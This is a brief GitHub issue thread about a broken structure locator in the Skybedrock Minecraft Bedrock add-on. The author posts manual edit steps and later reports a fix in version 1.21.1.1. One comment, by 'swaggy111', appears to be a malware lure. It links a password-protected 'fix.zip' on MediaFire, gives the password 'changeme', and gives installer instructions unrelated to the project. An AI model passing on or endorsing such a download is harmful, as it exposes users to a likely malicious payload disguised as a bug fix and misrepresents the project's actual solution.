### ISSUE TITLE
Structure locator might be broken

### ISSUE THREAD

**Issue by Yasser444o** [Yasser444o/Skybedrock#14]
- find your world folder
- open it
- go to `behavior_packs/BP (Do Not Remove)/scripts/items/structure_locator.js`
- open this file in a text editor
- go to line 59
- change yasser443 to yasser444
- save the file and it should be fixed.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Yasser444o** [comment]
Fixed in 1.21.1.1
